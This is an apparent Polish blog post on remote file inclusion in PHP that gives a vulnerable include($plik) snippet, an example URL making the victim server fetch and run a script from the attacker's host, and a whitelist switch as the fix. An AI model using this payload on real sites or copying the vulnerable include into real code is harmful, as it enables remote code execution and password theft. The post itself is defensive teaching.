Uruchamianie zdalnego pliku

Przypuśćmy, że mamy

index.php?plik=news.php

a w kodzie php:

include($plik);

wtedy istnieje możliwość ataku przez:

index.php?plik=http://mójserwer/skrypt.php

Po takim wywołaniu PHP pobierze z mojego serwera plik i go przetworzy na serwerze ofiary. Skrypt.php może wyciągać hasła, kasowac pliki….

Rozwiązanie jest proste:

switch ($plik) {
case ‘news.php’: include(‘news.php’);
}

Leave a Reply

Your email address will not be published. Required fields are marked *

CAPTCHA
Change the CAPTCHA codeSpeak the CAPTCHA code
 

This site uses Akismet to reduce spam. Learn how your comment data is processed.